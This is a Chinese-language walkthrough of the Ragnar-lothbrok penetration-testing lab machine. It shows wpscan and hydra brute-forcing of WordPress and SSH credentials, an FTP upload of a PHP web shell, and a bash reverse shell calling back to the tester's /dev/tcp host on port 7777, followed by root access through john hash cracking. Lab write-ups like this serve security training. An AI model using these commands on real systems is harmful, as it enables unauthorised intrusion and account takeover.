Ragnar-lothbrok 靶机

Ragnar-lothbrok

信息搜集

存活检测

image-20231025221132716

详细扫描

image-20231025221227283

后台网页扫描

image-20231025221253760

网站信息搜集

  • secret “秘密”网页

    image-20231025221349345

    将密文保存到 password.txt

  • 此页面使用了 wordpress CMS

    image-20231025221836685

  • 疑似用户 ragnar

  • wpscan 也爆破出了用户 ragnar

    wpscan --url http://10.4.7.155/wordpress/ --enumerate u 
    

    image-20231025222706934

密码获取

  • 尝试利用搜集的用户名和密码爆破网站、ftp、ssh 密码

尝试网页登录爆破

wpscan --url http://10.4.7.155/wordpress/ --usernames ragnar --passwords password.txt

爆破出密码 ubbe

image-20231025223612116

ssh 爆破

hydra -l ragnar -P password.txt ssh://10.4.7.155

ragnar 密码为 lagertha

image-20231025224147806

漏洞利用

  • 查看 ftp 中有用的信息

    image-20231025224457074

  • 未搜集到有用信息

  • 网页登录

    10.4.7.155/wordpress/wp-login.php
    
    ragnar
    ubbe
    

    image-20231025224606889

    卡的登不上去

    image-20231025225020665

  • 直接尝试 ftp 上传一句话木马

    image-20231025224952782

    put shell.php
    

    成功上传

    image-20231025225149229

  • 蚁剑连接,发现可以连接

    image-20231025225311439

  • 打开蚁剑中虚拟终端,反弹进 kali

    bash -c 'bash -i >& /dev/tcp/10.4.7.146/7777 0>&1'
    

    image-20231025225553201

    成功反弹

提权

  • 信息搜集

    切换到 home 目录,发现有用户 ragnar

    image-20231025230050152

  • 尝试使用其 web 和 ftp 密码登录

    密码未 ftp 登陆密码 lagertha

    image-20231025230236343

  • 查找敏感文件

    在 秘密 文件中可以直接看到 root 加密后的密码

    image-20231025230835014

  • john 爆破

  • 切换 root

    成功提权

    image-20231026091720785

    image-20231026091711015

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值